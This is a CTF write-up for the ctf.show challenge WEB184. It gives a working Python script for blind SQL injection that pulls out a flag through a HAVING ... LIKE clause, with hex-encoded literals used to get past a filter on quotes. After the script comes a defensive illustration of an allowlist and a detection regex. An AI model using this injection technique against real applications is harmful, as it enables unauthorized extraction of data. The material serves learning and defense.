WEB184

This challenge uses the WHERE, HAVING and ON conditional clauses as the SQL injection point.

Script

import requests, re

# Character set for the blind search; "-" is included because the flag may contain it
dic = "-1234567890abcdefghijklmnopqrstuvwxyz"
url = "http://77f67f80-314c-4fcb-aeee-047f4aa6f35f.challenge.ctf.show/select-waf.php"
res = []  # flag characters recovered so far
# tableName is concatenated into the query, so a HAVING clause can be appended to it
post_tem = "ctfshow_user group by pass HAVING pass like {}"

def str_to_hex(s):
    # Hex-encode the string so it can be sent as a 0x... literal, with no quotes needed
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])

for a in range(1, 50):
    temp = len(res)
    for i in dic:
        res.append(i)
        # "%" is the LIKE wildcard, so only the prefix guessed so far is tested
        post = {"tableName": post_tem.format("0x" + str_to_hex("ctfshow{" + "".join(res) + "%}"))}
        print(post)
        r = requests.post(url=url, data=post)
        if re.findall(r"\$user_count = 1", r.text):
            break  # guess is correct, keep this character
        res.pop(-1)  # wrong guess, try the next character

    if temp == len(res):
        break  # no character matched, so the flag is complete

print("ctfshow{" + "".join(res) + "}")


Note that this challenge filters single and double quotes, so the string has to be passed as a hexadecimal literal; a hex string does not need to be wrapped in single or double quotes.
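As an added illustration that is not part of this writeup or the challenge's own code, the Python below contrasts a quote blacklist of the kind the challenge uses with an identifier allowlist, and adds a log check for the HAVING ... LIKE 0x... shape of payload the script sends. The allowlist contents and the function names are assumptions made for the example.

```python
import re

# Constructed illustration: a quote-blacklist filter like the one the challenge
# uses, the identifier allowlist a fixed endpoint would use instead, and a
# request-log check for the quote-free hex-literal comparison in this writeup.

def quote_blacklist(table_name: str) -> bool:
    """Returns True when the input passes a filter that only bans ' and "."""
    return "'" not in table_name and '"' not in table_name

# Hypothetical allowlist for the example; ctfshow_user is the table from the writeup.
ALLOWED_TABLES = {"ctfshow_user"}
IDENTIFIER_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")

def identifier_allowlist(table_name: str) -> bool:
    """Returns True only for a bare identifier that is also an allowed table."""
    return bool(IDENTIFIER_RE.fullmatch(table_name)) and table_name in ALLOWED_TABLES

# Detection: a conditional keyword followed by a comparison against a 0x literal,
# which is what a quote-free payload like the one in this writeup looks like.
HEX_COMPARE_RE = re.compile(
    r"\b(where|having|on)\b.*?(\blike\b|\bregexp\b|=)\s*0x[0-9a-f]+",
    re.IGNORECASE | re.DOTALL,
)

def flag_hex_compare(value: str) -> bool:
    """Returns True when a submitted tableName value contains such a comparison."""
    return HEX_COMPARE_RE.search(value) is not None

def sample_payload() -> str:
    """The writeup's payload shape with the flag prefix hex-encoded (constructed)."""
    return "ctfshow_user group by pass HAVING pass like 0x" + "ctfshow{%}".encode().hex()

if __name__ == "__main__":
    p = sample_payload()
    print("quote blacklist passes payload:", quote_blacklist(p))       # True
    print("identifier allowlist passes payload:", identifier_allowlist(p))  # False
    print("detector flags payload:", flag_hex_compare(p))               # True
```

The blacklist lets the hex payload through, while the allowlist rejects anything that is not a bare, known table name.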